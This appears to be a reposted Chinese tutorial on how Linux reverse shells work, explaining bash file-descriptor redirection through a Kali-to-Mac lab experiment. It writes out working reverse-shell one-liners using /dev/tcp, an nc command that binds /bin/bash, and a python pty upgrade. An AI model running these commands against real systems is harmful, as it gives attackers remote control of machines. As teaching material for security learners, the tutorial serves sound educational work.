linux中反彈shell的原理是什么-創(chuàng)新互聯(lián)

這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)碛嘘P(guān)linux中反彈shell的原理是什么，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

創(chuàng)新互聯(lián)長期為1000多家客戶提供的網(wǎng)站建設(shè)服務(wù)，團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年，關(guān)注不同地域、不同群體，并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù)；打造開放共贏平臺(tái)，與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為黟縣企業(yè)提供專業(yè)的成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作，黟縣網(wǎng)站改版等技術(shù)服務(wù)。擁有十余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

什么是Linux系統(tǒng)

Linux是一種免費(fèi)使用和自由傳播的類UNIX操作系統(tǒng)，是一個(gè)基于POSIX的多用戶、多任務(wù)、支持多線程和多CPU的操作系統(tǒng)，使用Linux能運(yùn)行主要的Unix工具軟件、應(yīng)用程序和網(wǎng)絡(luò)協(xié)議。

完整命令

反彈shell命令：

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

利用nc反彈shell：

nc -lvvp 12345 -t -e /bin/bash

原理

bash -i > /dev/tcp/ip/port 0>&1 2>&1
bash -i 打開一個(gè)交互式的bash
&是為了區(qū)分文件1和文件描述符1的
a>&b 的意思是 a>b 2>&1
0代表輸入 ，0>&1 意思是，將輸出的窗口上所輸入的值當(dāng)作當(dāng)前窗口的輸入。反彈shell后會(huì)有兩個(gè)窗口，即靶機(jī)的shell窗口跟攻擊機(jī)的shell口。這命令的意思也可以理解為，將攻擊機(jī)窗口的輸入當(dāng)作靶機(jī)窗口的輸入最終輸入給靶機(jī)。2代表標(biāo)準(zhǔn)錯(cuò)誤輸出。

實(shí)驗(yàn)

通過一個(gè)小實(shí)驗(yàn)幫助大家理解

第一步，將shell的正確輸出重定向到外部主機(jī)

假設(shè)我們在kali上輸入的命令為：
bash -i > /dev/tcp/192.168.124.1/9999，這句話的意思是將交互式shell的標(biāo)準(zhǔn)輸出重定向到192.168.124.1的9999端口。

在mac上監(jiān)聽端口命令為：nc -l 9999

首先在kali上輸入whoami命令，發(fā)現(xiàn)沒有回顯，因?yàn)榛仫@被重定向到了mac上。

但是當(dāng)我們在kali上出入錯(cuò)誤命令的時(shí)候，卻存在回顯。

第二步，將錯(cuò)誤輸出重定向到外部主機(jī)

我們只需要在上面的命令后面加上 2>&1即可，意思為將錯(cuò)誤輸出重定向到標(biāo)準(zhǔn)輸出上，也就是重定向到我們的外部主機(jī)。

這時(shí)候發(fā)現(xiàn)在kali上按鍵盤已經(jīng)沒有任何回顯了，回顯全部出現(xiàn)在了mac的shell上：

這是因?yàn)槲覀円呀?jīng)將所有的輸出都重定向到了外部主機(jī)上，但問題是現(xiàn)在我們的控制權(quán)還在kali上，mac無法進(jìn)行任何輸出操作，只能顯示輸出。這時(shí)候我們幾句需要將輸入的權(quán)限給予我們的mac。

第三步，交出輸入權(quán)限

只需要在第二步命令的基礎(chǔ)上加上 0>&1即可。

這時(shí)候已經(jīng)可以在mac上完全控制kali的shell了，實(shí)驗(yàn)結(jié)束。

其他

當(dāng)shell不穩(wěn)定時(shí)候用python的虛擬化終端：

python -c "import pty;pty.spawn('/bin/bash')"

上述就是小編為大家分享的linux中反彈shell的原理是什么了，如果剛好有類似的疑惑，不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí)，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

網(wǎng)站欄目：linux中反彈shell的原理是什么-創(chuàng)新互聯(lián)
瀏覽地址：http://muchs.cn/article34/cedipe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供面包屑導(dǎo)航、外貿(mào)建站、企業(yè)建站、網(wǎng)站內(nèi)鏈、網(wǎng)站制作、網(wǎng)站排名

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)